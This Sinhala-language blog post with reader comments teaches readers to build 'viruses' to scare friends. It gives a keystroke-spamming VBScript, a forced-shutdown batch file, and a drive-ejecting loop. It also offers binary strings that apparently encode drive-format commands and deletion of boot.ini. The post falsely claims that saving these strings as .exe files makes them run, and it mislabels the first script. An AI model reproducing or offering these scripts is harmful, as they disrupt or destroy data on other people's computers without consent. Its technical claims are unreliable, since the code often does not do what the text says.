යාලුවෝ බය කරන්න Virus හදමුද ? Part 2

ඔයාලාට කොහොමද ? මම මේ පාර ගෙනාවා දැනට ලිපි 2 කට කලින් ගෙනාපු එකේ PART 2 එක...ඒ මොකද්ද දන්නවද "යාලුවෝ බය කරන්න පුළුවන් Virus හදන එකේ දෙවන කොටසයි...ඔයාලත් ආස ඇති නේ Virus හදන්න ..එත් මම ගිය පාර ගෙනාවට වඩා භයානක Virus ටිකක් තමා මේ පාර ගෙනාවේ...ඔයාල නිකමටවත් Open කරලා බලන්නවත් එපා හොදේ...එක නෙමෙයි මම මේ පාර Virus වර්ග 5 කටත් වඩා හදන විදිය ගෙනාවා..ඔන්න මම දැන් දෙන්නම් ඒ ටික හදන හැටි..මම කියන විදියටම කරන්න හොදේ...

                                       මෙන්න Part 1 එක 





1.මෙන්න පළමු Virus එක හදන හැටි



මෙම Virus එකෙන් වෙන්නේ "සදහටම Mouse එකේ Right Button එක වැඩ නැති කරවන එකයි..."



* මුලින්ම Desktop මත Right Click කර New කියන තැනට ගිහින් New Text Document කියන එක Click කරන්න...



*ඊට පස්සේ New Text Document කියන එක විවෘත කර ගන්න...



*දැන් ඔය පහළ තියෙන Code එක අකුරක් නෑරම Copy කරගෙන විවෘත කර ගත් Text Document එකේ Paste කරන්න...



Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop



* අන්තිමට Notpad එකේ File වලට ගිහින් Save As මත Click කර File Name කියන එකේ අවසානයට .vbs කියලා ගහලා Save කරන්න...[උදාහරණයක්:- Right Click Disable.vbs]



මේක Open කලොත් නැති කර ගන්නේ Widows Task Manager වල Proccess කියන එකේ තියෙන wscript.exe කියන එක End Proccess කළාට පසුවයි...



2.මෙන්න දෙවන Virus එක හද හැටි



මෙම Virus එකෙන් වෙන්නේ "එක දිගට පරිගණක Shutdown වෙන එකයි..."



*මුලින්ම Text Document එකක් විවෘත කර ගන්න...



*පහළ තියෙන Code එක Copy කරගෙන විවෘත කර ගත් Text Document එකේ Paste කරන්න.



wx@echo off
msg * RUN TO Your Computer Virus
shutdown -c Error! You are too stupid! -s



*දැන් Save As වලට ගිහින් File Name කියන එකේ අවසානයට .bat කියලා ගහලා Save කරන්න...[උදාහරණයක්:- Shutdown Virus.bat]



මේක Windows 7,Vista,8වල අත්හදා  බැලීමක් කර නැත...මේක Windows XP විවෘතවල කලොත් නැති කර ගන්නේ පරිගණකය Restart කිරීමෙන් පසුවයි...



3.මෙන්න තුන්වන Virus එක හදන හැටි



මෙම Virus එකෙන් වෙන්නේ  "පරිගණකයේ Hard Disk අතරින් :\A Disk එක Format වෙන එකයි..."



*මුලින්ම Text Document එකක් විවෘත කර ගන්න...



*පහළ තියෙන Code එක Copy කරගෙන විවෘත කර ගත් Text Document එකේ Paste කරන්න...



01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000




*දැන් Save As වලට ගිහින් File Name කියන එකේ අවසානයට .exe කියලා ගහලා Save කරන්න...[උදාහරණයක්:- A Drive Delete.exe]



මේක Windows 7,Vista,8වල අත්හදා බලන්න එපා...මේක Windows XP විවෘතවල කලොත් නැති කර ගන්නේ පරිගණකය Restart කිරීමෙන් පසුවයි...



4.මෙන්න හතරවන Virus එක හදන හැටි



මෙම Virus එකෙන් වෙන්නේ "පරිගණකයේ CD Rom,DVD Rom,DVD Writer නොනවත්වාම විවෘත වීමයි..."



*මුලින්ම Text Document එකක් විවෘත කර ගන්න...



*පහළ තියෙන Code එක Copy කරගෙන විවෘත කර ගත් Text Document එකේ Paste කරන්න...



Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop



*දැන් Save As වලට ගිහින් File Name කියන එකේ අවසානයට .vbs කියලා ගහලා Save කරන්න...[උදාහරණයක්:- Drive Eject Virus.bat]



මේක Open කලොත් නැති කර ගන්නේ Widows Task Manager වල Proccess කියන එකේ තියෙන wscript.exe කියන එක End Proccess කළාට පසුවයි...



5.මෙන්න පස්වන Virus එක හදන හැටි



මෙම Virus එකෙන් වෙන්නේ "පරිගණකයේ Hard Disk අතරින් :\C Disk එක Format වෙන එකයි..."



*මුලින්ම Text Document එකක් විවෘත කර ගන්න...



*පහළ තියෙන Code එක Copy කරගෙන විවෘත කර ගත් Text Document එකේ Paste කරන්න...



01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000



*දැන් Save As වලට ගිහින් File Name කියන එකේ අවසානයට .exe කියලා ගහලා Save කරන්න...[උදාහරණයක්:- C Drive Delete.exe]



මේක Open කලොත් නැති කර ගන්න ආකාරය මම තාම දන්නේ නෑ...



6.මෙන්න පස්වන Virus එක හදන හැටි



මෙම Virus එකෙන් වෙන්නේ "පරිගණකයේ Hard Disk අතරින් :\D Disk එක Format වෙන එකයි..."



*මුලින්ම Text Document එකක් විවෘත කර ගන්න...



*පහළ තියෙන Code එක Copy කරගෙන විවෘත කර ගත් Text Document එකේ Paste කරන්න...



01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000



*දැන් Save As වලට ගිහින් File Name කියන එකේ අවසානයට .exe කියලා ගහලා Save කරන්න...[උදාහරණයක්:- D Drive Delete.exe]



මේක Open කලොත් නැති කර ගන්න ආකාරය මම තාම දන්නේ නෑ...



7.මෙන්න පස්වන Virus එක හදන හැටි



මෙම Virus එකෙන් වෙන්නේ "පරිගණකයේ Book.ini කියන File එක Delete කරනවා...කරාට පස්සේ පරිගණකය BOOT වෙන්නේ
නෑ"...මේක තමා ගොඩාක් භයානක....



*මුලින්ම Text Document එකක් විවෘත කර ගන්න...



*පහළ තියෙන Code එක Copy කරගෙන විවෘත කර ගත් Text Document එකේ Paste කරන්න...



01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001



*දැන් Save As වලට ගිහින් File Name කියන එකේ අවසානයට .exe කියලා ගහලා Save කරන්න...[උදාහරණයක්:- Boot INI Delete.exe]



මේක Open කලොත් නැති කර ගන්න ආකාරය මම තාම දන්නේ නෑ...



දැනුම්දීමයි:-එක පාරක් දෙපාරක් කළාට අවුලක් නෑ...ගොඩක් කරන්න
එපා...*Computer එකට හොද නෑ...



දාලා බලලා හොද නම් Commenටුවක් දාන්න... මම තව ලිපියක් අරන් එන්නම්...අමතක කරන්න එපා මේ පිටුවට Like එකක් දාලා Member වෙලා යන්න...එහෙනම් මම යනවා...




                                            *ඔයාලට*
                                          සු ක්...!!!




       මෙන්න සුපුන්ගේ බ්ලොග් අවකාශය Facebook Fan Page එක

Previous
Next Post »

2 අදහස්

Click here for අදහස්
Anonymous
admin
August 2, 2013 at 7:29 AM ×

Machan uba hodata karala thiyenawa....Superb...........

Reply
avatar
August 6, 2013 at 9:16 AM ×

ok....thanx...machan...

Reply
avatar